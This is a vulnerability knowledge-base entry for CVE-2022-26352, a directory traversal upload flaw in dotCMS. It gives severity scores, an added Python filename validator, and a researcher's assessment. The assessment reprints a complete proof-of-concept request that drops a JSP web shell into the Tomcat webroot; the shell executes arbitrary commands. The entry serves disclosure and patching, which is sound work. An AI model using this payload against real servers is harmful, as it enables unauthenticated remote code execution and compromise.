AttackerKB AKB:BFE90B13-C7B7-4AF4-B31C-FEA8B1A352B3
History: Jul 17, 2022 - 12:00 a.m.

CVE-2022-26352

2022-07-17 00:00:00
attackerkb.com

CVSS3: 9.8 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 6.8 Medium
  Access Vector: NETWORK
  Access Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

EPSS: 0.975 High
  Percentile: 100.0%

An issue was discovered in the ContentResource API in dotCMS 3.0 through 22.02. Attackers can craft a multipart form request to post a file whose filename is not initially sanitized. This allows directory traversal, in which the file is saved outside of the intended storage location. If anonymous content creation is enabled, this allows an unauthenticated attacker to upload an executable file, such as a .jsp file, that can lead to remote code execution.
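The core of the bug is that the `filename` parameter of a multipart part is used as-is when building the storage path. As an added example (not dotCMS code and not from the assessment below), the following script pulls the filename out of a multipart body shaped like the PoC request and applies the checks a hardened upload handler needs: reject traversal segments, confirm the normalized target still lies under the storage root, and refuse container-executable extensions. The storage root path and the sample request are constructed assumptions.

```python
"""Added example (not dotCMS code): vet a multipart upload filename before
it is ever joined onto a storage directory."""
import posixpath
import re
from email.parser import BytesParser
from email.policy import default

STORAGE_ROOT = "/opt/dotcms/assets/tmp_upload"               # assumed upload directory
SERVER_EXEC_EXT = {".jsp", ".jspx", ".jspf", ".jsw", ".jsv"}  # executed by Tomcat if reachable

# Constructed request (headers + body only, HTTP request line removed), shaped
# like the PoC: the filename parameter carries a traversal sequence.
SAMPLE_REQUEST = (
    b"Host: 172.16.199.227:8443\r\n"
    b"Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\r\n"
    b"\r\n"
    b"--------------------------aadc326f7ae3eac3\r\n"
    b'Content-Disposition: form-data; name="name"; filename="../../a.jsp"\r\n'
    b"Content-Type: text/plain\r\n"
    b"\r\n"
    b"placeholder body\r\n"
    b"--------------------------aadc326f7ae3eac3--\r\n"
)

def multipart_filenames(raw: bytes) -> list[str]:
    """Return every filename= parameter found in the request's multipart parts."""
    msg = BytesParser(policy=default).parsebytes(raw)
    return [p.get_filename() for p in msg.iter_parts() if p.get_filename()]

def vet_upload_name(filename: str) -> dict:
    """Reject names that would escape STORAGE_ROOT or be executed by the container."""
    reasons = []
    posix = filename.replace("\\", "/")          # treat Windows separators like POSIX ones
    if "\x00" in filename:
        reasons.append("null byte in filename")
    if posix.startswith("/") or re.match(r"^[A-Za-z]:", posix):
        reasons.append("absolute path")
    if re.search(r"(^|/)\.\.(/|$)", posix):
        reasons.append("path traversal segment")
    # The decisive check: where would the file actually land after normalization?
    resolved = posixpath.normpath(posixpath.join(STORAGE_ROOT, posix))
    if not resolved.startswith(STORAGE_ROOT + "/"):
        reasons.append("resolved target leaves storage root")
    ext = posixpath.splitext(posixpath.basename(posix))[1].lower()
    if ext in SERVER_EXEC_EXT:
        reasons.append(f"server-executable extension {ext}")
    return {"original": filename, "resolved": resolved,
            "safe_name": posixpath.basename(posix), "accept": not reasons, "reasons": reasons}

if __name__ == "__main__":
    for name in multipart_filenames(SAMPLE_REQUEST):
        print(vet_upload_name(name))
```

For the PoC filename the resolved target is two directories above the storage root, which is exactly the "saved outside of the intended storage location" condition described above; a handler that stores only `safe_name` under the root, after these checks pass, closes that path.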

Recent assessments:

jheysel-r7 at May 26, 2022 10:31pm UTC reported:

The API used by DotCMS is vulnerable to an arbitrary file upload vulnerability which can lead to RCE. The /api/content/ endpoint allows for files to be uploaded to the Tomcat server. The filename in versions prior to 22.03, 5.3.8.10, 21.06.7 is not sanitized and allows the attacker to drop a malicious .jsp file in the webroot of the Tomcat server, which is accessible remotely.

PoC taken from the write-up mentioned below:

POST /api/content/ HTTP/1.1
Host: 172.16.199.227:8443
User-Agent: curl/7.64.1
Accept: */*
Content-Length: 1085
Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3
Connection: close

--------------------------aadc326f7ae3eac3
Content-Disposition: form-data; name="name"; filename="../../a.jsp"
Content-Type: text/plain

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<br>");
    Process p;
    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
    }
    else{
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    }
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
    out.println(disr);
    disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>
--------------------------aadc326f7ae3eac3--

The filename has been changed to work on Windows and on Linux irrespective of the relative install path of DotCMS.

This vulnerability is trivial to exploit and patching immediately is recommended.

The security research to find this vulnerability was performed by Hussein Daher and Shubham Shah and they have written a very nice detailed write-up for more information.

Assessed Attacker Value: 4
Second rating (label garbled in source): 5
